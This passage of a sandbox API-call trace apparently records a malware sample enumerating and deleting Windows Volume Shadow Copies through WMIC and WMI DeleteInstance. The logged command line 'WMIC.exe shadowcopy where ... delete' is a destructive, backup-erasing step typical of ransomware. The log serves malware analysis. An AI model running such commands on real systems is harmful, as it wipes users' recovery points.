(Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="CALL", cchCount2=4) returned 3 [0108.827] lstrlenW (lpString="ASSOC") returned 5 [0108.827] lstrlenW (lpString="delete") returned 6 [0108.827] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="ASSOC", cchCount2=5) returned 3 [0108.827] lstrlenW (lpString="DELETE") returned 6 [0108.827] lstrlenW (lpString="delete") returned 6 [0108.827] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="DELETE", cchCount2=6) returned 2 [0108.827] lstrlenW (lpString="Select * from Win32_ShadowCopy") returned 30 [0108.827] malloc (_Size=0x3e) returned 0x46d080 [0108.827] lstrlenW (lpString="Select * from Win32_ShadowCopy") returned 30 [0108.827] wcstok (in: _String="Select * from Win32_ShadowCopy", _Delimiter=" ", _Context=0xffffffffffffff20 | out: _String="Select", _Context=0xffffffffffffff20) returned="Select" [0108.827] malloc (_Size=0x18) returned 0x46cc00 [0108.827] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x0 | out: _String=0x0, _Context=0x0) returned="*" [0108.827] lstrlenW (lpString="FROM") returned 4 [0108.827] lstrlenW (lpString="*") returned 1 [0108.827] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="*", cchCount1=1, lpString2="FROM", cchCount2=4) returned 1 [0108.827] malloc (_Size=0x18) returned 0x46cb80 [0108.828] free (_Block=0x46cc00) [0108.828] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x3b00760009 | out: _String=0x0, _Context=0x3b00760009) returned="from" [0108.828] lstrlenW (lpString="FROM") returned 4 [0108.828] lstrlenW (lpString="from") returned 4 [0108.828] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="from", cchCount1=4, lpString2="FROM", cchCount2=4) returned 2 [0108.828] malloc (_Size=0x18) returned 0x46cc00 [0108.828] free (_Block=0x46cb80) [0108.828] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x3c00760009 | out: _String=0x0, _Context=0x3c00760009) returned="Win32_ShadowCopy" [0108.828] malloc (_Size=0x18) returned 0x46cb80 [0108.828] free (_Block=0x46cc00) [0108.828] free (_Block=0x46d080) [0108.828] free (_Block=0x46cb80) [0108.828] lstrlenW (lpString="SET") returned 3 [0108.828] lstrlenW (lpString="delete") returned 6 [0108.828] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="SET", cchCount2=3) returned 1 [0108.828] lstrlenW (lpString="CREATE") returned 6 [0108.828] lstrlenW (lpString="delete") returned 6 [0108.828] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="CREATE", cchCount2=6) returned 3 [0108.828] free (_Block=0x46cef0) [0108.828] malloc (_Size=0x8) returned 0x466f20 [0108.828] lstrlenW (lpString="GET") returned 3 [0108.828] lstrlenW (lpString="delete") returned 6 [0108.829] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="GET", cchCount2=3) returned 1 [0108.829] lstrlenW (lpString="LIST") returned 4 [0108.829] lstrlenW (lpString="delete") returned 6 [0108.829] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="LIST", cchCount2=4) returned 1 [0108.829] lstrlenW (lpString="ASSOC") returned 5 [0108.829] lstrlenW (lpString="delete") returned 6 [0108.829] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="ASSOC", cchCount2=5) returned 3 [0108.829] WbemLocator:IUnknown:AddRef (This=0x1d51390) returned 0x3 [0108.829] free (_Block=0x32dfb0) [0108.829] lstrlenW (lpString="") returned 0 [0108.829] lstrlenW (lpString="XDUWTFONO") returned 9 [0108.829] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="XDUWTFONO", cchCount1=9, lpString2="", cchCount2=0) returned 3 [0108.829] lstrlenW (lpString="XDUWTFONO") returned 9 [0108.829] malloc (_Size=0x14) returned 0x46cb80 [0108.829] lstrlenW (lpString="XDUWTFONO") returned 9 [0108.829] GetCurrentThreadId () returned 0x8ac [0108.829] GetCurrentProcess () returned 0xffffffffffffffff [0108.829] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x28, TokenHandle=0x10f740 | out: TokenHandle=0x10f740*=0x280) returned 1 [0108.829] GetTokenInformation (in: TokenHandle=0x280, TokenInformationClass=0x3, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x10f738 | out: TokenInformation=0x0, ReturnLength=0x10f738) returned 0 [0108.829] malloc (_Size=0x118) returned 0x46d080 [0108.829] GetTokenInformation (in: TokenHandle=0x280, TokenInformationClass=0x3, TokenInformation=0x46d080, TokenInformationLength=0x118, ReturnLength=0x10f738 | out: TokenInformation=0x46d080, ReturnLength=0x10f738) returned 1 [0108.829] AdjustTokenPrivileges (in: TokenHandle=0x280, DisableAllPrivileges=0, NewState=0x46d080*(PrivilegesCount=0x17, Privileges=((Luid.LowPart=0x5, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x9), (Luid.LowPart=0x2, Luid.HighPart=10, Attributes=0x0), (Luid.LowPart=0xb, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0xd), (Luid.LowPart=0x2, Luid.HighPart=14, Attributes=0x0), (Luid.LowPart=0xf, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x12), (Luid.LowPart=0x2, Luid.HighPart=19, Attributes=0x0), (Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x17), (Luid.LowPart=0x3, Luid.HighPart=24, Attributes=0x0), (Luid.LowPart=0x19, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x1d), (Luid.LowPart=0x3, Luid.HighPart=30, Attributes=0x0), (Luid.LowPart=0x21, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x23), (Luid.LowPart=0x2, Luid.HighPart=-1991049105, Attributes=0xa2b5), (Luid.LowPart=0x0, Luid.HighPart=4640496, Attributes=0x0), (Luid.LowPart=0x0, Luid.HighPart=0, Attributes=0x0), (Luid.LowPart=0x0, Luid.HighPart=0, Attributes=0x0), (Luid.LowPart=0x0, Luid.HighPart=0, Attributes=0x0), (Luid.LowPart=0x0, Luid.HighPart=0, Attributes=0x0))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1 [0108.829] free (_Block=0x46d080) [0108.829] CloseHandle (hObject=0x280) returned 1 [0108.830] lstrlenW (lpString="GET") returned 3 [0108.830] lstrlenW (lpString="delete") returned 6 [0108.830] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="GET", cchCount2=3) returned 1 [0108.830] lstrlenW (lpString="LIST") returned 4 [0108.830] lstrlenW (lpString="delete") returned 6 [0108.830] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="LIST", cchCount2=4) returned 1 [0108.830] lstrlenW (lpString="SET") returned 3 [0108.830] lstrlenW (lpString="delete") returned 6 [0108.830] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="SET", cchCount2=3) returned 1 [0108.830] lstrlenW (lpString="CALL") returned 4 [0108.830] lstrlenW (lpString="delete") returned 6 [0108.830] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="CALL", cchCount2=4) returned 3 [0108.830] lstrlenW (lpString="ASSOC") returned 5 [0108.830] lstrlenW (lpString="delete") returned 6 [0108.830] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="ASSOC", cchCount2=5) returned 3 [0108.830] lstrlenW (lpString="CREATE") returned 6 [0108.830] lstrlenW (lpString="delete") returned 6 [0108.830] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="CREATE", cchCount2=6) returned 3 [0108.830] lstrlenW (lpString="DELETE") returned 6 [0108.830] lstrlenW (lpString="delete") returned 6 [0108.830] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="DELETE", cchCount2=6) returned 2 [0108.830] malloc (_Size=0x18) returned 0x46cc00 [0108.830] lstrlenA (lpString="") returned 0 [0108.830] malloc (_Size=0x2) returned 0x32dfb0 [0108.831] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xffc3314c, cbMultiByte=-1, lpWideCharStr=0x32dfb0, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0108.831] free (_Block=0x32dfb0) [0108.831] malloc (_Size=0x18) returned 0x46cca0 [0108.831] lstrlenA (lpString="") returned 0 [0108.831] malloc (_Size=0x2) returned 0x32dfb0 [0108.831] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xffc3314c, cbMultiByte=-1, lpWideCharStr=0x32dfb0, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0108.831] free (_Block=0x32dfb0) [0108.831] lstrlenW (lpString="Select * from Win32_ShadowCopy") returned 30 [0108.831] malloc (_Size=0x3e) returned 0x46d080 [0108.831] lstrlenW (lpString="Select * from Win32_ShadowCopy") returned 30 [0108.831] wcstok (in: _String="Select * from Win32_ShadowCopy", _Delimiter=" ", _Context=0xffffffffffffff20 | out: _String="Select", _Context=0xffffffffffffff20) returned="Select" [0108.831] malloc (_Size=0x18) returned 0x46cba0 [0108.831] free (_Block=0x46cca0) [0108.831] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x3f006e0007 | out: _String=0x0, _Context=0x3f006e0007) returned="*" [0108.831] lstrlenW (lpString="FROM") returned 4 [0108.831] lstrlenW (lpString="*") returned 1 [0108.831] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="*", cchCount1=1, lpString2="FROM", cchCount2=4) returned 1 [0108.831] malloc (_Size=0x18) returned 0x46cca0 [0108.831] free (_Block=0x46cba0) [0108.831] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x40006e0007 | out: _String=0x0, _Context=0x40006e0007) returned="from" [0108.831] lstrlenW (lpString="FROM") returned 4 [0108.831] lstrlenW (lpString="from") returned 4 [0108.832] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="from", cchCount1=4, lpString2="FROM", cchCount2=4) returned 2 [0108.832] malloc (_Size=0x18) returned 0x46cba0 [0108.832] free (_Block=0x46cca0) [0108.832] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x41006e0007 | out: _String=0x0, _Context=0x41006e0007) returned="Win32_ShadowCopy" [0108.832] malloc (_Size=0x18) returned 0x46cca0 [0108.832] free (_Block=0x46cba0) [0108.832] free (_Block=0x46d080) [0108.832] malloc (_Size=0x18) returned 0x46cba0 [0108.832] malloc (_Size=0x18) returned 0x46cc20 [0108.832] malloc (_Size=0x18) returned 0x46cc40 [0108.832] malloc (_Size=0x18) returned 0x46cc60 [0108.832] SysStringLen (param_1="SELECT * FROM ") returned 0xe [0108.832] SysStringLen (param_1="Win32_ShadowCopy") returned 0x10 [0108.832] malloc (_Size=0x18) returned 0x46cc80 [0108.832] SysStringLen (param_1="SELECT * FROM Win32_ShadowCopy") returned 0x1e [0108.832] SysStringLen (param_1=" WHERE ") returned 0x7 [0108.832] malloc (_Size=0x18) returned 0x46ccc0 [0108.833] SysStringLen (param_1="SELECT * FROM Win32_ShadowCopy WHERE ") returned 0x25 [0108.833] SysStringLen (param_1="ID='{1AADC94C-D98B-4E59-91DD-8E2EFE01CFB1}'") returned 0x2b [0108.833] free (_Block=0x46cc00) [0108.833] free (_Block=0x46cc80) [0108.833] free (_Block=0x46cc60) [0108.833] free (_Block=0x46cc40) [0108.833] free (_Block=0x46cc20) [0108.833] free (_Block=0x46cba0) [0108.833] ??0CHString@@QEAA@XZ () returned 0x10f6b0 [0108.833] GetCurrentThreadId () returned 0x8ac [0108.833] malloc (_Size=0x18) returned 0x46cba0 [0108.833] malloc (_Size=0x18) returned 0x46cc20 [0108.833] malloc (_Size=0x18) returned 0x46cc40 [0108.833] malloc (_Size=0x18) returned 0x46cc60 [0108.833] malloc (_Size=0x18) returned 0x46cc80 [0108.833] SysStringLen (param_1="\\\\") returned 0x2 [0108.833] SysStringLen (param_1="XDUWTFONO") returned 0x9 [0108.834] malloc (_Size=0x18) returned 0x46cc00 [0108.834] SysStringLen (param_1="\\\\XDUWTFONO") returned 0xb [0108.834] SysStringLen (param_1="\\") returned 0x1 [0108.834] malloc (_Size=0x18) returned 0x46cce0 [0108.834] SysStringLen (param_1="\\\\XDUWTFONO\\") returned 0xc [0108.834] SysStringLen (param_1="ROOT\\CIMV2") returned 0xa [0108.834] free (_Block=0x46cc00) [0108.834] free (_Block=0x46cc80) [0108.834] free (_Block=0x46cc60) [0108.834] free (_Block=0x46cc40) [0108.834] free (_Block=0x46cc20) [0108.834] free (_Block=0x46cba0) [0108.834] malloc (_Size=0x18) returned 0x46cba0 [0108.834] malloc (_Size=0x18) returned 0x46cc20 [0108.834] malloc (_Size=0x18) returned 0x46cc40 [0108.835] WbemLocator:IWbemLocator:ConnectServer (in: This=0x1d51390, strNetworkResource="\\\\XDUWTFONO\\ROOT\\CIMV2", strUser=0x0, strPassword=0x0, strLocale="ms_409", lSecurityFlags=0, strAuthority=0x0, pCtx=0x0, ppNamespace=0xffca29d0 | out: ppNamespace=0xffca29d0*=0x1d63c18) returned 0x0 [0108.840] free (_Block=0x46cc40) [0108.840] free (_Block=0x46cc20) [0108.840] free (_Block=0x46cba0) [0108.840] CoSetProxyBlanket (pProxy=0x1d63c18, dwAuthnSvc=0xffffffff, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x0) returned 0x0 [0108.841] free (_Block=0x46cce0) [0108.841] ??1CHString@@QEAA@XZ () returned 0x7fef4af482c [0108.841] ??0CHString@@QEAA@XZ () returned 0x10f600 [0108.841] GetCurrentThreadId () returned 0x8ac [0108.841] malloc (_Size=0x18) returned 0x46cce0 [0108.841] lstrlenA (lpString="") returned 0 [0108.841] malloc (_Size=0x2) returned 0x32dfb0 [0108.841] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xffc3314c, cbMultiByte=-1, lpWideCharStr=0x32dfb0, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0108.841] free (_Block=0x32dfb0) [0108.841] SysStringLen (param_1="SELECT * FROM Win32_ShadowCopy WHERE ID='{1AADC94C-D98B-4E59-91DD-8E2EFE01CFB1}'") returned 0x50 [0108.841] SysStringLen (param_1="") returned 0x0 [0108.841] free (_Block=0x46cce0) [0108.841] malloc (_Size=0x18) returned 0x46cce0 [0108.841] IWbemServices:ExecQuery (in: This=0x1d63c18, strQueryLanguage="WQL", strQuery="SELECT * FROM Win32_ShadowCopy WHERE ID='{1AADC94C-D98B-4E59-91DD-8E2EFE01CFB1}'", lFlags=0, pCtx=0x0, ppEnum=0x10f608 | out: ppEnum=0x10f608*=0x1d63d18) returned 0x0 [0108.907] free (_Block=0x46cce0) [0108.907] CoSetProxyBlanket (pProxy=0x1d63d18, dwAuthnSvc=0xffffffff, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x0) returned 0x0 [0108.911] IEnumWbemClassObject:Next (in: This=0x1d63d18, lTimeout=-1, uCount=0x1, apObjects=0x10f610, puReturned=0x10f620 | out: apObjects=0x10f610*=0x1d63d80, puReturned=0x10f620*=0x1) returned 0x0 [0108.912] malloc (_Size=0x18) returned 0x46cce0 [0108.912] IWbemClassObject:Get (in: This=0x1d63d80, wszName="__PATH", lFlags=0, pVal=0x10f630*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x10f630*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\XDUWTFONO\\ROOT\\CIMV2:Win32_ShadowCopy.ID=\"{1AADC94C-D98B-4E59-91DD-8E2EFE01CFB1}\"", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0108.912] free (_Block=0x46cce0) [0108.912] malloc (_Size=0x800) returned 0x46d080 [0108.912] LoadStringW (in: hInstance=0x0, uID=0xb09c, lpBuffer=0x46d080, cchBufferMax=1024 | out: lpBuffer="Deleting instance %1\r\n") returned 0x16 [0108.912] FormatMessageW (in: dwFlags=0x2500, lpSource=0x46d080, dwMessageId=0x0, dwLanguageId=0x400, lpBuffer=0x10f558, nSize=0x0, Arguments=0x10f568 | out: lpBuffer="뚐*") returned 0x67 [0108.912] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Deleting instance \\\\XDUWTFONO\\ROOT\\CIMV2:Win32_ShadowCopy.ID=\"{1AADC94C-D98B-4E59-91DD-8E2EFE01CFB1}\"\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 104 [0108.912] malloc (_Size=0x68) returned 0x46d890 [0108.912] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Deleting instance \\\\XDUWTFONO\\ROOT\\CIMV2:Win32_ShadowCopy.ID=\"{1AADC94C-D98B-4E59-91DD-8E2EFE01CFB1}\"\r\n", cchWideChar=-1, lpMultiByteStr=0x46d890, cbMultiByte=104, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Deleting instance \\\\XDUWTFONO\\ROOT\\CIMV2:Win32_ShadowCopy.ID=\"{1AADC94C-D98B-4E59-91DD-8E2EFE01CFB1}\"\r\n", lpUsedDefaultChar=0x0) returned 104 [0108.912] ??YCHString@@QEAAAEBV0@PEBG@Z () returned 0xffca2ab0 [0108.912] fprintf (in: _File=0x7fefdf72ab0, _Format="%s" | out: _File=0x7fefdf72ab0) returned 103 [0108.913] fflush (in: _File=0x7fefdf72ab0 | out: _File=0x7fefdf72ab0) returned 0 [0108.913] free (_Block=0x46d890) [0108.913] free (_Block=0x46d080) [0108.913] LocalFree (hMem=0x2ab690) returned 0x0 [0108.913] IWbemServices:DeleteInstance (in: This=0x1d63c18, strObjectPath="\\\\XDUWTFONO\\ROOT\\CIMV2:Win32_ShadowCopy.ID=\"{1AADC94C-D98B-4E59-91DD-8E2EFE01CFB1}\"", lFlags=0, pCtx=0x0, ppCallResult=0x0 | out: ppCallResult=0x0) returned 0x0 [0111.339] IUnknown:Release (This=0x1d63d80) returned 0x0 [0111.339] malloc (_Size=0x800) returned 0x46d080 [0111.339] LoadStringW (in: hInstance=0x0, uID=0xb09e, lpBuffer=0x46d080, cchBufferMax=1024 | out: lpBuffer="Instance deletion successful.\r\n") returned 0x1f [0111.339] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Instance deletion successful.\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0111.339] malloc (_Size=0x20) returned 0x46cef0 [0111.339] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Instance deletion successful.\r\n", cchWideChar=-1, lpMultiByteStr=0x46cef0, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Instance deletion successful.\r\n", lpUsedDefaultChar=0x0) returned 32 [0111.340] ??YCHString@@QEAAAEBV0@PEBG@Z () returned 0xffca2ab0 [0111.340] fprintf (in: _File=0x7fefdf72ab0, _Format="%s" | out: _File=0x7fefdf72ab0) returned 31 [0111.340] fflush (in: _File=0x7fefdf72ab0 | out: _File=0x7fefdf72ab0) returned 0 [0111.340] free (_Block=0x46cef0) [0111.340] free (_Block=0x46d080) [0111.340] IEnumWbemClassObject:Next (in: This=0x1d63d18, lTimeout=-1, uCount=0x1, apObjects=0x10f610, puReturned=0x10f620 | out: apObjects=0x10f610*=0x0, puReturned=0x10f620*=0x0) returned 0x1 [0111.342] IUnknown:Release (This=0x1d63d18) returned 0x0 [0111.343] ??1CHString@@QEAA@XZ () returned 0x7fef4af482c [0111.343] free (_Block=0x46cca0) [0111.343] free (_Block=0x46ccc0) [0111.343] GetCurrentThreadId () returned 0x8ac [0111.343] ??0CHString@@QEAA@PEBG@Z () returned 0x10f7e8 [0111.344] ??YCHString@@QEAAAEBV0@PEBG@Z () returned 0x10f7e8 [0111.344] lstrlenW (lpString="LIST") returned 4 [0111.344] lstrlenW (lpString="delete") returned 6 [0111.344] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="LIST", cchCount2=4) returned 1 [0111.344] lstrlenW (lpString="ASSOC") returned 5 [0111.344] lstrlenW (lpString="delete") returned 6 [0111.344] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="ASSOC", cchCount2=5) returned 3 [0111.344] lstrlenW (lpString="GET") returned 3 [0111.344] lstrlenW (lpString="delete") returned 6 [0111.344] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="GET", cchCount2=3) returned 1 [0111.344] ??1CHString@@QEAA@XZ () returned 0x68530201 [0111.344] WbemLocator:IUnknown:Release (This=0x1d63c18) returned 0x0 [0111.345] ?Empty@CHString@@QEAAXXZ () returned 0x7fef4af482c [0111.345] _kbhit () returned 0x0 [0111.345] free (_Block=0x466f20) [0111.345] free (_Block=0x46cac0) [0111.345] free (_Block=0x46caa0) [0111.345] free (_Block=0x46ca80) [0111.345] free (_Block=0x46ca60) [0111.345] free (_Block=0x4670a0) [0111.346] free (_Block=0x46cb40) [0111.346] free (_Block=0x4685c0) [0111.346] free (_Block=0x46d020) [0111.346] free (_Block=0x46cbc0) [0111.346] free (_Block=0x46cfa0) [0111.346] free (_Block=0x46cae0) [0111.346] free (_Block=0x46cbe0) [0111.346] free (_Block=0x467140) [0111.346] free (_Block=0x466e00) [0111.346] free (_Block=0x46cff0) [0111.346] ?Empty@CHString@@QEAAXXZ () returned 0x7fef4af482c [0111.346] free (_Block=0x46ce20) [0111.346] free (_Block=0x46cb00) [0111.346] free (_Block=0x46cb20) [0111.346] free (_Block=0x46cf30) [0111.346] free (_Block=0x46cb60) [0111.346] free (_Block=0x467ee0) [0111.346] free (_Block=0x467f30) [0111.346] free (_Block=0x467f80) [0111.346] free (_Block=0x46cb80) [0111.346] free (_Block=0x466a20) [0111.346] free (_Block=0x466de0) [0111.347] free (_Block=0x468040) [0111.347] free (_Block=0x466dc0) [0111.347] free (_Block=0x468000) [0111.347] free (_Block=0x466d60) [0111.347] free (_Block=0x466d80) [0111.347] free (_Block=0x466c40) [0111.347] free (_Block=0x466c60) [0111.347] free (_Block=0x466be0) [0111.347] free (_Block=0x466c00) [0111.347] free (_Block=0x466ca0) [0111.347] free (_Block=0x466cc0) [0111.347] free (_Block=0x466d00) [0111.347] free (_Block=0x466d20) [0111.347] free (_Block=0x466b20) [0111.347] free (_Block=0x466b40) [0111.347] free (_Block=0x466ac0) [0111.348] free (_Block=0x466ae0) [0111.348] free (_Block=0x466b80) [0111.348] free (_Block=0x466ba0) [0111.348] free (_Block=0x466a60) [0111.348] free (_Block=0x466a80) [0111.348] free (_Block=0x4669d0) [0111.348] free (_Block=0x4669a0) [0111.348] free (_Block=0x466e90) [0111.348] WbemLocator:IUnknown:Release (This=0x1d51390) returned 0x2 [0111.348] WbemLocator:IUnknown:Release (This=0x1d63b28) returned 0x0 [0111.349] WbemLocator:IUnknown:Release (This=0x1d63a98) returned 0x0 [0111.349] WbemLocator:IUnknown:Release (This=0x1d51390) returned 0x1 [0111.349] ?Empty@CHString@@QEAAXXZ () returned 0x7fef4af482c [0111.349] WbemLocator:IUnknown:Release (This=0x1d51390) returned 0x0 [0111.349] free (_Block=0x46c9e0) [0111.349] free (_Block=0x46ca00) [0111.349] free (_Block=0x468540) [0111.349] free (_Block=0x46ca20) [0111.349] free (_Block=0x46ca40) [0111.349] free (_Block=0x468580) [0111.349] free (_Block=0x46c860) [0111.349] free (_Block=0x46c880) [0111.349] free (_Block=0x4683c0) [0111.349] free (_Block=0x46c8a0) [0111.350] free (_Block=0x46c8c0) [0111.350] free (_Block=0x468400) [0111.350] free (_Block=0x46c7e0) [0111.350] free (_Block=0x46c800) [0111.350] free (_Block=0x468340) [0111.350] free (_Block=0x46c820) [0111.350] free (_Block=0x46c840) [0111.350] free (_Block=0x468380) [0111.350] free (_Block=0x46c960) [0111.350] free (_Block=0x46c980) [0111.350] free (_Block=0x4684c0) [0111.350] free (_Block=0x46c9a0) [0111.350] free (_Block=0x46c9c0) [0111.350] free (_Block=0x468500) [0111.350] free (_Block=0x46c760) [0111.350] free (_Block=0x46c780) [0111.350] free (_Block=0x4682c0) [0111.350] free (_Block=0x46c7a0) [0111.350] free (_Block=0x46c7c0) [0111.351] free (_Block=0x468300) [0111.351] free (_Block=0x46c8e0) [0111.351] free (_Block=0x46c900) [0111.351] free (_Block=0x468440) [0111.351] free (_Block=0x46c920) [0111.351] free (_Block=0x46c940) [0111.351] free (_Block=0x468480) [0111.351] free (_Block=0x46c6a0) [0111.351] free (_Block=0x46c6c0) [0111.351] free (_Block=0x468200) [0111.351] free (_Block=0x46c560) [0111.351] free (_Block=0x46c580) [0111.351] free (_Block=0x4680c0) [0111.351] free (_Block=0x466e50) [0111.351] free (_Block=0x466e70) [0111.351] free (_Block=0x468080) [0111.351] free (_Block=0x46c5e0) [0111.351] free (_Block=0x46c600) [0111.351] free (_Block=0x468140) [0111.351] free (_Block=0x46c6e0) [0111.352] free (_Block=0x46c700) [0111.352] free (_Block=0x468240) [0111.352] free (_Block=0x46c5a0) [0111.352] free (_Block=0x46c5c0) [0111.352] free (_Block=0x468100) [0111.352] free (_Block=0x46c620) [0111.352] free (_Block=0x46c640) [0111.352] free (_Block=0x468180) [0111.352] free (_Block=0x46c660) [0111.352] free (_Block=0x46c680) [0111.352] free (_Block=0x4681c0) [0111.352] free (_Block=0x46c720) [0111.352] free (_Block=0x46c740) [0111.352] free (_Block=0x468280) [0111.352] CoUninitialize () [0111.372] exit (_Code=0) [0111.372] free (_Block=0x46cd30) [0111.373] free (_Block=0x467ea0) [0111.373] ??1CHString@@QEAA@XZ () returned 0x7fef4af482c [0111.373] free (_Block=0x466f40) [0111.373] free (_Block=0x466a40) [0111.373] free (_Block=0x467e60) [0111.373] free (_Block=0x467e20) [0111.373] free (_Block=0x467dd0) [0111.373] free (_Block=0x467d90) [0111.373] free (_Block=0x467d30) [0111.373] free (_Block=0x465a90) [0111.373] free (_Block=0x465a50) [0111.373] ??1CHString@@QEAA@XZ () returned 0x7fef4af482c [0111.373] free (_Block=0x46cec0) Thread: id = 202 os_tid = 0x500 Thread: id = 203 os_tid = 0x5b0 Thread: id = 204 os_tid = 0x330 Thread: id = 205 os_tid = 0x30c Thread: id = 206 os_tid = 0x8dc Process: id = "36" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x71317000" os_pid = "0x8bc" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xaec" cmd_line = "cmd.exe /c C:\\Windows\\System32\\wbem\\WMIC.exe shadowcopy where \"ID='{1EE90775-4E53-4C29-811E-F4996057D94E}'\" delete" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 207 os_tid = 0xa98 [0111.482] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x26fcb0 | out: lpSystemTimeAsFileTime=0x26fcb0*(dwLowDateTime=0x4a030310, dwHighDateTime=0x1d68245)) [0111.482] GetCurrentProcessId () returned 0x8bc [0111.482] GetCurrentThreadId () returned 0xa98 [0111.482] GetTickCount () returned 0x1151804 [0111.482] QueryPerformanceCounter (in: lpPerformanceCount=0x26fcb8 | out: lpPerformanceCount=0x26fcb8*=23137491693) returned 1 [0111.485] GetModuleHandleW (lpModuleName=0x0) returned 0x49eb0000 [0111.485] __set_app_type (_Type=0x1) [0111.485] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x49ed7810) returned 0x0 [0111.485] __getmainargs (in: _Argc=0x49efa608, _Argv=0x49efa618, _Env=0x49efa610, _DoWildCard=0, _StartInfo=0x49ede0f4 | out: _Argc=0x49efa608, _Argv=0x49efa618, _Env=0x49efa610) returned 0 [0111.485] 